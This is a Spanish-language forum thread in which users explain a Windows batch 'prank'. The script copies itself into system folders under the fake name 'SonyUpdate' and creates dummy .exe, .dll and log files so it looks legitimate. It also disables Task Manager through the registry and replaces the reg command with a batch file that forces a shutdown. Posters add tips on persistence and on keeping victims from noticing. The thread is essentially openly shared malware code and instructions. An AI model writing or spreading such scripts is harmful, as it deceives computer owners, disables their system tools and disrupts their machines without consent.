Broma Batch

Bueno el %0 especifica la ruta del programa en ejecucion. En este caso lo use para copiarlo a el mismo a la ruta c:\windows\system32 con el nombre SonyUpdate.
- Segundo el objetivo de :

Cita de: The Shadow en Agosto 08, 2006, 06:01:53

copy %0 %systemdir%\SonyUpdate.bat
mkdir %programfiles%\SonyUpdate
copy %0 %programfiles%\SonyUpdate\SonyUpdate.bat
echo saljdfhower>ChO923.dll
echo fasdlfhwehrfw>Flip.exe
Echo Sony System is Update 12/9/06 12:31 am>UpdateLog.log

es hacer creer al usuario que se ha instalado un programa legitimo. Como? Pues como notaras he escogido el nombre de SonyUpdate para el supuesto programa. La broma crea por si sola archivos: .exe, .dll y .log que no son reales, solo sirven para hacer que el "programa" sea mas legitimo.
Y por ultimo

Cita de: PoWeReD en Agosto 11, 2006, 07:27:12

y la parte donde pone
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /T REG_Dword /d 1 /f
si en vez de DisableTaskMgr le ponemos otro nombre, dara lo mismo? lo digo para que el nombre no sea tan evidente, porque si realiza una busqueda en el registro lo encontraria en seguida... xD
y kuando se deshabilita el editor del registro aun se puede modificar mediante el cmd?

Si cambias el comando para desabilitar el TaskMgr, no funcionaria ya que "DisableTaskMgr" es un codigo unico. No te preocupes hay muy pocas posibilidades de que el usuario lo vea. Si se puede modificar el editor de registros por cmd. Pero si estas cosas te preocupan solo tienes que joder el comando reg. Por ejemplo haciendo esto:

@echo off
cd %windir%\system32
copy reg.exe "%programfiles%\archivos comunes\Adobe.dll"
echo shutdown -s -f -t 60 -c "IDIOTA" -d up:125:1>reg.bat
echo El comando reg esta jodido.....

pause>nul
exit

Otra cosa que podrias hacer es usar un programa creado por la broma que verifique que el SonyUpdate.bat que es la broma, si es borrado tenga una copia de seguridad y que modifique el registro para que la broma se corra desde otra ubicacion. O haciendo esto:

....
echo saodhfoanfhvnhikjhvcwteicvewr>SonyUpdate.exe
attrib -s -h -r SonyUpdate.bat
...

Saludosssss Cool

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Reglamento del Foro

Linux Registered User #473016

Lo entendi todo, menos lo nuevo ke pusiste...

Cita de: The Shadow en Agosto 13, 2006, 02:25:43

Si se puede modificar el editor de registros por cmd. Pero si estas cosas te preocupan solo tienes que joder el comando reg. Por ejemplo haciendo esto:

@echo off
cd %windir%\system32
copy reg.exe "%programfiles%\archivos comunes\Adobe.dll"
echo shutdown -s -f -t 60 -c "IDIOTA" -d up:125:1>reg.bat
echo El comando reg esta jodido.....

esas partes no las entendi... lo de joderle el editor a tu manera no la entiendo... sorry Shadow... esque he estado un poco desconectado del tema ultimamente... Tongue

saludos!! y perdona si te hago explicar tantas cosas, pero espero ke asi tambien aprendan los newbies....

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Bueno Powered para que lo entiendas mejor, intenta esto : Entra en %systemdir%\system32 y seleciona un programa que se maneje por cmd y q no uses por ejemplo el shadow.exe, copialo a un lugar seguro, luego lo eliminas, luego abre cmd y escribes esto: echo shutdown -s -f -t 60 -d up:125:1>c:\windows\system32\shadow.bat , Ahora si ejecutas el comando shadow en la consola, la pc se te apagara.
ce que en el codigo que te escribi en el msg anterior, no se elimina el comando Tongue

lo siento se me paso.
No se mi me as entendido pero estoy seguro que la tecnica funciona (la usos en varios programas).
No te preocupes si tienes otra duda, te ayudare en lo que pueda.
Saludos... Cool

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Reglamento del Foro

Linux Registered User #473016

vale vale vale, ya lo he pillado, lo que me habia rallado era el -d up.... sabes? pero ya lo mire en el cmd Cheesy

es el codigo de apagado y esas cosillas... xD
entonces donde ponias copy reg.exe "%programfiles%\archivos comunes\Adobe.dll"
era para poner a salvo el archivo reg.exe convirtiendolo en un dll no? y lo que te faltaba (ya lo habias dicho) era el /Y para que no pidiera confirmacion verdad? entonces lo que has hecho es que cada vez que use el comando reg, o reg add, o alguno de REG se le haga un shutdown no? creo que ya lo entiendo Cheesy

gracias amigo!

saludos!!

PD: os recuerdo un post que puse, en el que preguntaba si se podia eliminar el efecto de la X para cerrar la ventana de conversacion, para que no la cierre... (como cuando haces un shutdown, el mensaje de apagado no se puede cerrar porque la X esta deshabilitada)

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Octubre 15, 2008, 10:30:50